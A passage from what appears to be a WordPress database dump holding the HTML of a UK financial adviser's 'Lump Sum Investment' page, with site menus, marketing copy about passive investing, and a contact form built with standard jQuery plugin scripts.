{\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body>','&#13;\n	Life Insurance','','publish','closed','closed','','life-insurance','','','2017-09-21 16:34:34','2017-09-21 16:34:34','',0,'http://www.equalitywalk.org.uk/life-insurance',0,'page','',0),(78,1,'2017-09-21 16:34:34','2017-09-21 16:34:34','<body class=\"page page-id-116 page-child parent-pageid-28 page-template page-template-100-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-116 current_page_item menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Lump Sum Investment										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/investments\" title=\"Investments\">Investments</a></li><li>Lump Sum Investment</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"width-100\" style=\"overflow:hidden !important;padding-left:0px;padding-right:0px;\">&#13;\n		<div class=\"avada-row\" style=\"max-width:100%;\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-116\" class=\"post-116 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Lump Sum Investment</span>&#13;\n			<span class=\"updated\" style=\"display: none;\"/>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<h2 style=\"text-align: center;\"><span style=\"font-size: x-large;\"><span style=\"color: #99cc00;\">Lump Sum Investment</span> -We Help You Make The Most of Your Hard Earned Savings</span></h2>&#13;\n<p style=\"text-align: center;\"><span style=\"font-size: medium;\">Your lump sum investment could come from a lottery win, an inheritance, downsizing your property, a divorce settlement, proceeds from a life assurance policy and numerous other means. </span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"font-size: medium;\">Finding yourself with a large sum investment or some spare money can be a fortunate experience, but what do you do with it?</span></p>&#13;\n<p style=\"text-align: left;\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px\"/>&#13;\n<p/>&#13;\n<div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px\"/><div class=\"one_half\"> <style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>High Performing Investment Advice</h2><p/>&#13;\n<p>Spend it, save it in a bank account where it’s safe – or invest it where it has more opportunity to grow?</p>&#13;\n<p> </p>&#13;\n<p>There are lots of instances where we might find ourselves with some extra money – even quite a large lump sum investment – and although the first thought might be ‘<em>what can I buy</em>’ – it would be sensible to think ‘<em>what other options do I have</em>?’</p>&#13;\n<p> </p>&#13;\n<p>For most of us, we do consider what kind of risk we are prepared to take – and what we mean by risk can vary dramatically from person to person.</p>&#13;\n<p> </p>&#13;\n<p>There are many types of risk and some or all might affect any kind of investment we consider.</p>&#13;\n<p> </p>&#13;\n<p>We provide independent lump sum investment advice that is not restricted in any way. This allows us to <em>consider, identify and shortlist</em> the most appropriate investment options in the market today.</p>&#13;\n<p> </p>&#13;\n<p>Call us FREE on  or click the link to the right to discuss your investment</p></section></div></div><div class=\"one_half last\"><div class=\"accordian\"><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>Here\'s how we will help you make the most of your investment choices</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\">&#13;\n<ul><li>Jargon free independent advice, we have no affiliation with any business that could influence our assessment of your savings advice.</li>&#13;\n<li>No upfront advice charging or any hidden fees and costs.</li>&#13;\n<li>Bespoke portfolio – matched to your investment requirements and individual needs.</li>&#13;\n<li>Annual reviews – to keep your investment on track, grow and meet your savings goals.</li>&#13;\n<li>We don’t rush you into investment. You’ll feel safe in the knowledge that your savings needs are all being expertly handled by real people who care</li>&#13;\n</ul><p/></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>2o Years Established - That Counts</a></h5><div class=\"toggle-content \" style=\"\">This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our conversation.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise</a></h5><div class=\"toggle-content \" style=\"\">We stand for honesty – advice – trust and value. Our culture and people matter and promise you this, the team that makes Equity SMART work will be centred on you. Our team believe in treating clients like family, so you can be confident that we’ll give you the same advice we would give to our own relatives.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Investment Philosophy -Get Rich Slowly</a></h5><div class=\"toggle-content \" style=\"\">We believe in a “Get Rich Slowly” philosophy through a “passive investment” approach to purchasing investments. This we believe is the right choice for the majority of investors who are seeking more peace of mind, when looking to achieve sustained performance over the longer term.&#13;\n<ul><li>Passive investment is the rational, mathematically proven route to investing success.</li>&#13;\n<li>Our investment strategies are focused on your risk profile, well researched, efficient and low maintenance.</li>&#13;\n<li>We look to keep your costs low through longer term appreciation, reduced maintenance and look to avoid unnecessary trading.</li>&#13;\n<li>Ensure you are not over exposed at any time through wide diversification of your asset classes.</li>&#13;\n<li>We provide regular reviews and rebalancing when required or on a 6 monthly or yearly basis.</li>&#13;\n</ul><p/></div></div> <div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button large e.g. green\" href=\"#standard\" target=\"\">Click Here For Your Free Investment Review</a></div><div class=\"clearboth\"/> </div></div> <div class=\"fullwidth-box\" style=\"background-color:#fafafa;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid #fafafa;border-bottom:0px solid #fafafa;padding-top:5px;padding-bottom:1px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <div class=\"title\"><h1>Get Your Investment Review in 4 Easy Steps</h1><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div><div class=\"demo-sep sep-none\" style=\"margin-top:45px;\"/><style type=\"text/css\"><![CDATA[\r\n		#content-boxes-1 article.col{background-color:#ffffff !important;}\r\n		#content-boxes-1 .fontawesome-icon.circle-yes{color:#ffffff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-4\" id=\"content-boxes-1\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Contact us today</h2></div><div class=\"col-content-container \">Get in touch to find out how we can be of service. It’s confidential and we provide you with the highest level of consumer protection when it comes to Investment advice.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Prepare A Review</h2></div><div class=\"col-content-container \">We’ll get to know you, your specific needs and your financial circumstances to allow us to analyse and report back, allowing you to make better and more informed decisions.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Explain Options</h2></div><div class=\"col-content-container \">We’ll explain all the Investment options available to you, discuss both the pros &amp; the cons and then make a written recommendation on your best options.</div></article><article class=\"col last\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-ok\"/><h2>If You Proceed</h2></div><div class=\"col-content-container \">All the paperwork is arranged for you and processed quickly &amp; efficiently. Throughout this process we’ll always be in touch, keeping you in the loop and up to date.</div></article></section><style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#ffffff !important;border-width:1px;border-color:#f6f6f6!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"#standard\" target=\"\" class=\"continue button large default\">Start Your Investment Review</a><h2>Start Your Investment Review Today</h2><p>Click the button and fill out our short form and one of our advisers will contact you.</p><a href=\"#standard\" target=\"\" class=\"continue mobile-button button large default\">Start Your Investment Review</a></section></div><a id=\"iphorm_fancybox_52fddc0752c5f\" class=\"iphorm-fancybox-link iphorm-fancybox-link-1\" href=\"#\"/>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n<!--\r\n    jQuery(document).ready(function ($) {\r\n        var $link = $(\'#iphorm_fancybox_52fddc0752c5f\');\r\n        if ($.isFunction($.fn.fancybox) && !$link.data(\'iphorm-initialised\')) {\r\n            $link.fancybox($.extend({\r\n                inline: true,\r\n                href: \'#iphorm-outer-52fddc074edcc\',\r\n                onStart: function () {\r\n                    $(\'#fancybox-outer\').css(\'opacity\', 0);\r\n                },\r\n                onComplete: function () {\r\n                    $(\'#fancybox-wrap, #fancybox-content\').css({width: \'auto\'});\r\n                    $.fancybox.center(0);\r\n                    setTimeout(function () {\r\n                        $(\'#fancybox-outer\').animate({opacity: 1}, 400);\r\n                        $(\'#fancybox-overlay\').css({height: $(document).height()});\r\n                    }, 1);\r\n                }\r\n            }, {})).data(\'iphorm-initialised\', true);\r\n        }\r\n    });\r\n//-->\r\n]]></script><div style=\"display: none;\">&#13;\n<div id=\"iphorm-outer-52fddc074edcc\" class=\"iphorm-outer iphorm-outer-1 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-52fddc074edcc\').iPhorm({\"id\":1,\"uniqueId\":\"52fddc074edcc\",\"PHPSESSID\":\"d9dd8de0bbe6f89f9a64868119d5bbf4\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-52fddc074edcc\" class=\"iphorm iphorm-form-1\" action=\"../..lump-sum-investment/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-1\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"1\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"52fddc074edcc\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uklump-sum-investment/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"116\"/><input type=\"hidden\" name=\"post_title\" value=\"Lump Sum Investment\"/><h3 class=\"iphorm-title\">Contact Equity SMART&#13;\n                                        </h3><p class=\"iphorm-description\"><big>For expert impartial advice and a FREE consultation with no obligation fill out the short form below.<br/><br/>&#13;\n&#13;\nor<br/><br/><b>Call Us FREE on <span class=\"rTapNumber13629\"/></b>&#13;\n</big></p>&#13;\n                                    	            		<div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-1 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-group-wrap iphorm_1_6-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-1cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_1-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_1-element-spacer\">&#13;\n                    <label for=\"iphorm_1_1_52fddc074edcc\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_1\" id=\"iphorm_1_1_52fddc074edcc\" type=\"text\" name=\"iphorm_1_1\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-group-wrap iphorm_1_8-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_5-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_5-element-spacer\">&#13;\n                    <label for=\"iphorm_1_5_52fddc074edcc\">&#13;\n                Contact Number                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_5-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_5\" id=\"iphorm_1_5_52fddc074edcc\" type=\"text\" name=\"iphorm_1_5\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_2-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_2-element-spacer\">&#13;\n                    <label for=\"iphorm_1_2_52fddc074edcc\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_2-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_2\" id=\"iphorm_1_2_52fddc074edcc\" type=\"text\" name=\"iphorm_1_2\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div></div><div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-checkbox iphorm_1_11-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-checkbox iphorm_1_11-element-spacer\">&#13;\n                    <label class=\"iphorm_1_11-outer-label\">&#13;\n                What Would You Like To Discuss?                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-checkbox iphorm_1_11-input-wrap\">&#13;\n            <div class=\"iphorm-input-ul iphorm-input-checkbox-ul iphorm_1_11-input-ul iphorm-options-block iphorm-clearfix\">&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_1_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_1\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fddc074edcc_1\" value=\"Pensions\"/>&#13;\n                        Pensions                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_2_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_2\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fddc074edcc_2\" value=\"Insurance\"/>&#13;\n                        Insurance                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_3_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_3\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fddc074edcc_3\" value=\"Trusts\"/>&#13;\n                        Trusts                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_4_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_4\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fddc074edcc_4\" value=\"Investments\"/>&#13;\n                        Investments                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_5_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_5\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fddc074edcc_5\" value=\"Wealth\"/>&#13;\n                        Wealth                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_6_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_6\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fddc074edcc_6\" value=\"Other\"/>&#13;\n                        Other                    </label>&#13;\n                </div>&#13;\n                        </div>&#13;\n                    </div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_1_10-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_1_10-element-spacer\">&#13;\n                    <label for=\"iphorm_1_10_52fddc074edcc\">&#13;\n                Comments                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_1_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_1_10\" id=\"iphorm_1_10_52fddc074edcc\" name=\"iphorm_1_10\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-element-wrap iphorm-element-wrap-captcha iphorm_1_4-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-captcha iphorm_1_4-element-spacer\">&#13;\n                    <label for=\"iphorm_1_4_52fddc074edcc\">&#13;\n                Type the characters                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-captcha iphorm_1_4-input-wrap\">&#13;\n            <input class=\"iphorm-element-captcha  iphorm_1_4\" id=\"iphorm_1_4_52fddc074edcc\" type=\"text\" name=\"iphorm_1_4\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-captcha-image-wrap iphorm-clearfix 